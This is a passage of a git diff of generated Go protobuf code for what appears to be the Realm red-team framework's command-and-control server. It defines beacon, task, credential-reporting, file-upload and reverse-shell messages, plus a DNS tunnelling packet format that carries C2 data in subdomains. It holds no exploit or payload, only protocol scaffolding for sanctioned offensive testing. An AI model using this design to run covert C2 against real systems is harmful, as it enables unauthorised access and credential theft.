0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, - 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x01, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x22, 0x2a, 0x0a, 0x12, 0x46, 0x65, - 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, - 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0c, 0x52, - 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x22, 0x68, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 
0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x34, 0x0a, 0x0a, 0x63, 0x72, - 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x14, - 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x61, 0x6c, 0x52, 0x0a, 0x63, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, - 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, - 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x52, 0x0a, 0x11, - 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, - 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x24, 0x0a, 0x05, 0x63, 0x68, - 0x75, 0x6e, 0x6b, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, 0x2e, 0x65, 0x6c, 0x64, 0x72, - 0x69, 0x74, 0x63, 0x68, 0x2e, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, - 0x22, 0x14, 0x0a, 0x12, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, - 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x5e, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x12, 0x17, 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x01, 0x20, - 0x01, 0x28, 0x03, 0x52, 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x12, 0x29, 0x0a, 0x04, 0x6c, - 0x69, 0x73, 0x74, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x15, 0x2e, 0x65, 0x6c, 0x64, 0x72, - 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, - 0x52, 0x04, 0x6c, 0x69, 0x73, 0x74, 0x22, 0x1b, 0x0a, 0x19, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 
0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, - 0x6e, 0x73, 0x65, 0x22, 0x41, 0x0a, 0x17, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, - 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x26, - 0x0a, 0x06, 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0b, 0x32, 0x0e, - 0x2e, 0x63, 0x32, 0x2e, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x06, - 0x6f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x22, 0x1a, 0x0a, 0x18, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, - 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, - 0x73, 0x65, 0x22, 0x73, 0x0a, 0x13, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, - 0x6c, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, - 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, - 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, - 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, - 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x64, 0x61, 0x74, 0x61, 0x12, 0x17, - 0x0a, 0x07, 0x74, 0x61, 0x73, 0x6b, 0x5f, 0x69, 0x64, 0x18, 0x03, 0x20, 0x01, 0x28, 0x03, 0x52, - 0x06, 0x74, 0x61, 0x73, 0x6b, 0x49, 0x64, 0x22, 0x5b, 0x0a, 0x14, 0x52, 0x65, 0x76, 0x65, 0x72, - 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, - 0x2f, 0x0a, 0x04, 0x6b, 0x69, 0x6e, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x1b, 0x2e, - 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, 0x52, 0x04, 0x6b, 0x69, 0x6e, 0x64, - 0x12, 0x12, 0x0a, 0x04, 0x64, 0x61, 0x74, 0x61, 0x18, 0x02, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, - 0x64, 0x61, 0x74, 0x61, 0x2a, 0x8f, 0x01, 0x0a, 0x17, 0x52, 0x65, 0x76, 0x65, 0x72, 
0x73, 0x65, - 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x4b, 0x69, 0x6e, 0x64, - 0x12, 0x2a, 0x0a, 0x26, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, - 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x55, - 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, 0x12, 0x23, 0x0a, 0x1f, - 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, 0x4c, 0x4c, 0x5f, 0x4d, 0x45, - 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, 0x44, 0x41, 0x54, 0x41, 0x10, - 0x01, 0x12, 0x23, 0x0a, 0x1f, 0x52, 0x45, 0x56, 0x45, 0x52, 0x53, 0x45, 0x5f, 0x53, 0x48, 0x45, - 0x4c, 0x4c, 0x5f, 0x4d, 0x45, 0x53, 0x53, 0x41, 0x47, 0x45, 0x5f, 0x4b, 0x49, 0x4e, 0x44, 0x5f, - 0x50, 0x49, 0x4e, 0x47, 0x10, 0x02, 0x32, 0xfc, 0x03, 0x0a, 0x02, 0x43, 0x32, 0x12, 0x3d, 0x0a, - 0x0a, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x12, 0x15, 0x2e, 0x63, 0x32, - 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, 0x6b, 0x73, 0x52, 0x65, 0x71, 0x75, 0x65, - 0x73, 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x43, 0x6c, 0x61, 0x69, 0x6d, 0x54, 0x61, 0x73, - 0x6b, 0x73, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x3d, 0x0a, 0x0a, - 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, - 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, - 0x74, 0x1a, 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x46, 0x65, 0x74, 0x63, 0x68, 0x41, 0x73, 0x73, 0x65, - 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x30, 0x01, 0x12, 0x4d, 0x0a, 0x10, 0x52, - 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x12, - 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, - 0x6e, 0x74, 0x69, 0x61, 0x6c, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 
0x70, 0x6f, 0x72, 0x74, 0x43, 0x72, 0x65, 0x64, 0x65, 0x6e, 0x74, 0x69, - 0x61, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x3d, 0x0a, 0x0a, 0x52, 0x65, - 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x15, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, - 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, - 0x16, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x46, 0x69, 0x6c, 0x65, 0x52, - 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x28, 0x01, 0x12, 0x50, 0x0a, 0x11, 0x52, 0x65, 0x70, - 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x1c, - 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, - 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1d, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, - 0x69, 0x73, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x12, 0x4f, 0x0a, 0x10, 0x52, - 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, 0x75, 0x74, 0x12, - 0x1b, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, - 0x75, 0x74, 0x70, 0x75, 0x74, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x1c, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x70, 0x6f, 0x72, 0x74, 0x54, 0x61, 0x73, 0x6b, 0x4f, 0x75, 0x74, 0x70, - 0x75, 0x74, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, 0x00, 0x12, 0x47, 0x0a, 0x0c, - 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x12, 0x17, 0x2e, 0x63, - 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, - 0x71, 0x75, 0x65, 0x73, 0x74, 0x1a, 0x18, 0x2e, 0x63, 0x32, 0x2e, 0x52, 0x65, 0x76, 0x65, 0x72, - 0x73, 0x65, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x22, - 0x00, 0x28, 0x01, 0x30, 0x01, 0x42, 0x23, 0x5a, 0x21, 0x72, 
0x65, 0x61, 0x6c, 0x6d, 0x2e, 0x70, - 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, 0x6e, 0x74, 0x65, 0x72, 0x6e, - 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x63, 0x32, 0x70, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, - 0x6f, 0x33, -}) +const file_c2_proto_rawDesc = "" + + "\n" + + "\bc2.proto\x12\x02c2\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x0eeldritch.proto\"'\n" + + "\x05Agent\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\"\xb9\x02\n" + + "\x06Beacon\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\x12\x1c\n" + + "\tprincipal\x18\x02 \x01(\tR\tprincipal\x12\x1c\n" + + "\x04host\x18\x03 \x01(\v2\b.c2.HostR\x04host\x12\x1f\n" + + "\x05agent\x18\x04 \x01(\v2\t.c2.AgentR\x05agent\x12\x1a\n" + + "\binterval\x18\x05 \x01(\x04R\binterval\x122\n" + + "\ttransport\x18\x06 \x01(\x0e2\x14.c2.Beacon.TransportR\ttransport\"b\n" + + "\tTransport\x12\x19\n" + + "\x15TRANSPORT_UNSPECIFIED\x10\x00\x12\x12\n" + + "\x0eTRANSPORT_GRPC\x10\x01\x12\x13\n" + + "\x0fTRANSPORT_HTTP1\x10\x02\x12\x11\n" + + "\rTRANSPORT_DNS\x10\x03\"\xfe\x01\n" + + "\x04Host\x12\x1e\n" + + "\n" + + "identifier\x18\x01 \x01(\tR\n" + + "identifier\x12\x12\n" + + "\x04name\x18\x02 \x01(\tR\x04name\x12-\n" + + "\bplatform\x18\x03 \x01(\x0e2\x11.c2.Host.PlatformR\bplatform\x12\x1d\n" + + "\n" + + "primary_ip\x18\x04 \x01(\tR\tprimaryIp\"t\n" + + "\bPlatform\x12\x18\n" + + "\x14PLATFORM_UNSPECIFIED\x10\x00\x12\x14\n" + + "\x10PLATFORM_WINDOWS\x10\x01\x12\x12\n" + + "\x0ePLATFORM_LINUX\x10\x02\x12\x12\n" + + "\x0ePLATFORM_MACOS\x10\x03\x12\x10\n" + + "\fPLATFORM_BSD\x10\x04\"Y\n" + + "\x04Task\x12\x0e\n" + + "\x02id\x18\x01 \x01(\x03R\x02id\x12\"\n" + + "\x04tome\x18\x02 \x01(\v2\x0e.eldritch.TomeR\x04tome\x12\x1d\n" + + "\n" + + "quest_name\x18\x03 \x01(\tR\tquestName\"\x1d\n" + + "\tTaskError\x12\x10\n" + + "\x03msg\x18\x01 \x01(\tR\x03msg\"\xe3\x01\n" + + "\n" + + "TaskOutput\x12\x0e\n" + + "\x02id\x18\x01 \x01(\x03R\x02id\x12\x16\n" + + 
"\x06output\x18\x02 \x01(\tR\x06output\x12#\n" + + "\x05error\x18\x03 \x01(\v2\r.c2.TaskErrorR\x05error\x12B\n" + + "\x0fexec_started_at\x18\x04 \x01(\v2\x1a.google.protobuf.TimestampR\rexecStartedAt\x12D\n" + + "\x10exec_finished_at\x18\x05 \x01(\v2\x1a.google.protobuf.TimestampR\x0eexecFinishedAt\"7\n" + + "\x11ClaimTasksRequest\x12\"\n" + + "\x06beacon\x18\x01 \x01(\v2\n" + + ".c2.BeaconR\x06beacon\"4\n" + + "\x12ClaimTasksResponse\x12\x1e\n" + + "\x05tasks\x18\x01 \x03(\v2\b.c2.TaskR\x05tasks\"'\n" + + "\x11FetchAssetRequest\x12\x12\n" + + "\x04name\x18\x01 \x01(\tR\x04name\"*\n" + + "\x12FetchAssetResponse\x12\x14\n" + + "\x05chunk\x18\x01 \x01(\fR\x05chunk\"h\n" + + "\x17ReportCredentialRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x124\n" + + "\n" + + "credential\x18\x02 \x01(\v2\x14.eldritch.CredentialR\n" + + "credential\"\x1a\n" + + "\x18ReportCredentialResponse\"R\n" + + "\x11ReportFileRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12$\n" + + "\x05chunk\x18\x02 \x01(\v2\x0e.eldritch.FileR\x05chunk\"\x14\n" + + "\x12ReportFileResponse\"^\n" + + "\x18ReportProcessListRequest\x12\x17\n" + + "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12)\n" + + "\x04list\x18\x02 \x01(\v2\x15.eldritch.ProcessListR\x04list\"\x1b\n" + + "\x19ReportProcessListResponse\"A\n" + + "\x17ReportTaskOutputRequest\x12&\n" + + "\x06output\x18\x01 \x01(\v2\x0e.c2.TaskOutputR\x06output\"\x1a\n" + + "\x18ReportTaskOutputResponse\"s\n" + + "\x13ReverseShellRequest\x12/\n" + + "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + + "\x04data\x18\x02 \x01(\fR\x04data\x12\x17\n" + + "\atask_id\x18\x03 \x01(\x03R\x06taskId\"[\n" + + "\x14ReverseShellResponse\x12/\n" + + "\x04kind\x18\x01 \x01(\x0e2\x1b.c2.ReverseShellMessageKindR\x04kind\x12\x12\n" + + "\x04data\x18\x02 \x01(\fR\x04data*\x8f\x01\n" + + "\x17ReverseShellMessageKind\x12*\n" + + "&REVERSE_SHELL_MESSAGE_KIND_UNSPECIFIED\x10\x00\x12#\n" + + 
"\x1fREVERSE_SHELL_MESSAGE_KIND_DATA\x10\x01\x12#\n" + + "\x1fREVERSE_SHELL_MESSAGE_KIND_PING\x10\x022\xfc\x03\n" + + "\x02C2\x12=\n" + + "\n" + + "ClaimTasks\x12\x15.c2.ClaimTasksRequest\x1a\x16.c2.ClaimTasksResponse\"\x00\x12=\n" + + "\n" + + "FetchAsset\x12\x15.c2.FetchAssetRequest\x1a\x16.c2.FetchAssetResponse0\x01\x12M\n" + + "\x10ReportCredential\x12\x1b.c2.ReportCredentialRequest\x1a\x1c.c2.ReportCredentialResponse\x12=\n" + + "\n" + + "ReportFile\x12\x15.c2.ReportFileRequest\x1a\x16.c2.ReportFileResponse(\x01\x12P\n" + + "\x11ReportProcessList\x12\x1c.c2.ReportProcessListRequest\x1a\x1d.c2.ReportProcessListResponse\x12O\n" + + "\x10ReportTaskOutput\x12\x1b.c2.ReportTaskOutputRequest\x1a\x1c.c2.ReportTaskOutputResponse\"\x00\x12G\n" + + "\fReverseShell\x12\x17.c2.ReverseShellRequest\x1a\x18.c2.ReverseShellResponse\"\x00(\x010\x01B#Z!realm.pub/tavern/internal/c2/c2pbb\x06proto3" var ( file_c2_proto_rawDescOnce sync.Once diff --git a/tavern/internal/c2/dnspb/dns.pb.go b/tavern/internal/c2/dnspb/dns.pb.go new file mode 100644 index 000000000..83c2ff9b3 --- /dev/null +++ b/tavern/internal/c2/dnspb/dns.pb.go @@ -0,0 +1,510 @@ +// Code generated by protoc-gen-go. DO NOT EDIT. +// versions: +// protoc-gen-go v1.36.11 +// protoc v6.32.0 +// source: dns.proto + +package dnspb + +import ( + protoreflect "google.golang.org/protobuf/reflect/protoreflect" + protoimpl "google.golang.org/protobuf/runtime/protoimpl" + reflect "reflect" + sync "sync" + unsafe "unsafe" +) + +const ( + // Verify that this generated code is sufficiently up-to-date. + _ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion) + // Verify that runtime/protoimpl is sufficiently up-to-date. 
+	_ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20)
+)
+
+// PacketType defines the type of DNS packet in the conversation
+type PacketType int32
+
+const (
+	PacketType_PACKET_TYPE_UNSPECIFIED PacketType = 0
+	PacketType_PACKET_TYPE_INIT        PacketType = 1 // Establish conversation
+	PacketType_PACKET_TYPE_DATA        PacketType = 2 // Send data chunk
+	PacketType_PACKET_TYPE_FETCH       PacketType = 3 // Retrieve response chunk
+	PacketType_PACKET_TYPE_STATUS      PacketType = 4 // Server status response with ACKs/NACKs
+)
+
+// Enum value maps for PacketType.
+var (
+	PacketType_name = map[int32]string{
+		0: "PACKET_TYPE_UNSPECIFIED",
+		1: "PACKET_TYPE_INIT",
+		2: "PACKET_TYPE_DATA",
+		3: "PACKET_TYPE_FETCH",
+		4: "PACKET_TYPE_STATUS",
+	}
+	PacketType_value = map[string]int32{
+		"PACKET_TYPE_UNSPECIFIED": 0,
+		"PACKET_TYPE_INIT":        1,
+		"PACKET_TYPE_DATA":        2,
+		"PACKET_TYPE_FETCH":       3,
+		"PACKET_TYPE_STATUS":      4,
+	}
+)
+
+func (x PacketType) Enum() *PacketType {
+	p := new(PacketType)
+	*p = x
+	return p
+}
+
+func (x PacketType) String() string {
+	return protoimpl.X.EnumStringOf(x.Descriptor(), protoreflect.EnumNumber(x))
+}
+
+func (PacketType) Descriptor() protoreflect.EnumDescriptor {
+	return file_dns_proto_enumTypes[0].Descriptor()
+}
+
+func (PacketType) Type() protoreflect.EnumType {
+	return &file_dns_proto_enumTypes[0]
+}
+
+func (x PacketType) Number() protoreflect.EnumNumber {
+	return protoreflect.EnumNumber(x)
+}
+
+// Deprecated: Use PacketType.Descriptor instead.
+func (PacketType) EnumDescriptor() ([]byte, []int) {
+	return file_dns_proto_rawDescGZIP(), []int{0}
+}
+
+// DNSPacket is the main message format for DNS C2 communication.
+// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as a DNS subdomain.
+type DNSPacket struct {
+	state          protoimpl.MessageState `protogen:"open.v1"`
+	Type           PacketType             `protobuf:"varint,1,opt,name=type,proto3,enum=dns.PacketType" json:"type,omitempty"` // Packet type
+	Sequence       uint32                 `protobuf:"varint,2,opt,name=sequence,proto3" json:"sequence,omitempty"` // Chunk sequence number (0-based for INIT, 1-based for DATA)
+	ConversationId string                 `protobuf:"bytes,3,opt,name=conversation_id,json=conversationId,proto3" json:"conversation_id,omitempty"` // 8-character random conversation ID
+	Data           []byte                 `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` // Chunk payload (or InitPayload for INIT packets)
+	Crc32          uint32                 `protobuf:"varint,5,opt,name=crc32,proto3" json:"crc32,omitempty"` // Optional CRC32 for validation
+	// Async protocol fields for windowed transmission
+	WindowSize    uint32                  `protobuf:"varint,6,opt,name=window_size,json=windowSize,proto3" json:"window_size,omitempty"` // Number of packets client has in-flight
+	Acks          []*AckRange             `protobuf:"bytes,7,rep,name=acks,proto3" json:"acks,omitempty"` // Ranges of successfully received chunks (SACK)
+	Nacks         []uint32                `protobuf:"varint,8,rep,packed,name=nacks,proto3" json:"nacks,omitempty"` // Specific sequence numbers to retransmit
+	unknownFields protoimpl.UnknownFields
+	sizeCache     protoimpl.SizeCache
+}
+
+func (x *DNSPacket) Reset() {
+	*x = DNSPacket{}
+	mi := &file_dns_proto_msgTypes[0]
+	ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
+	ms.StoreMessageInfo(mi)
+}
+
+func (x *DNSPacket) String() string {
+	return protoimpl.X.MessageStringOf(x)
+}
+
+func (*DNSPacket) ProtoMessage() {}
+
+func (x *DNSPacket) ProtoReflect() protoreflect.Message {
+	mi := &file_dns_proto_msgTypes[0]
+	if x != nil {
+		ms := 
protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use DNSPacket.ProtoReflect.Descriptor instead. +func (*DNSPacket) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{0} +} + +func (x *DNSPacket) GetType() PacketType { + if x != nil { + return x.Type + } + return PacketType_PACKET_TYPE_UNSPECIFIED +} + +func (x *DNSPacket) GetSequence() uint32 { + if x != nil { + return x.Sequence + } + return 0 +} + +func (x *DNSPacket) GetConversationId() string { + if x != nil { + return x.ConversationId + } + return "" +} + +func (x *DNSPacket) GetData() []byte { + if x != nil { + return x.Data + } + return nil +} + +func (x *DNSPacket) GetCrc32() uint32 { + if x != nil { + return x.Crc32 + } + return 0 +} + +func (x *DNSPacket) GetWindowSize() uint32 { + if x != nil { + return x.WindowSize + } + return 0 +} + +func (x *DNSPacket) GetAcks() []*AckRange { + if x != nil { + return x.Acks + } + return nil +} + +func (x *DNSPacket) GetNacks() []uint32 { + if x != nil { + return x.Nacks + } + return nil +} + +// AckRange represents a contiguous range of acknowledged sequence numbers +type AckRange struct { + state protoimpl.MessageState `protogen:"open.v1"` + StartSeq uint32 `protobuf:"varint,1,opt,name=start_seq,json=startSeq,proto3" json:"start_seq,omitempty"` // Inclusive start of range + EndSeq uint32 `protobuf:"varint,2,opt,name=end_seq,json=endSeq,proto3" json:"end_seq,omitempty"` // Inclusive end of range + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *AckRange) Reset() { + *x = AckRange{} + mi := &file_dns_proto_msgTypes[1] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *AckRange) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*AckRange) ProtoMessage() {} + +func (x *AckRange) ProtoReflect() protoreflect.Message { + 
mi := &file_dns_proto_msgTypes[1] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use AckRange.ProtoReflect.Descriptor instead. +func (*AckRange) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{1} +} + +func (x *AckRange) GetStartSeq() uint32 { + if x != nil { + return x.StartSeq + } + return 0 +} + +func (x *AckRange) GetEndSeq() uint32 { + if x != nil { + return x.EndSeq + } + return 0 +} + +// InitPayload is the payload for INIT packets +// It contains metadata about the upcoming data transmission +type InitPayload struct { + state protoimpl.MessageState `protogen:"open.v1"` + MethodCode string `protobuf:"bytes,1,opt,name=method_code,json=methodCode,proto3" json:"method_code,omitempty"` // 2-character gRPC method code (e.g., "ct", "fa") + TotalChunks uint32 `protobuf:"varint,2,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of data chunks to expect + DataCrc32 uint32 `protobuf:"varint,3,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete request data + FileSize uint32 `protobuf:"varint,4,opt,name=file_size,json=fileSize,proto3" json:"file_size,omitempty"` // Total size of the file/data in bytes + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *InitPayload) Reset() { + *x = InitPayload{} + mi := &file_dns_proto_msgTypes[2] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *InitPayload) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*InitPayload) ProtoMessage() {} + +func (x *InitPayload) ProtoReflect() protoreflect.Message { + mi := 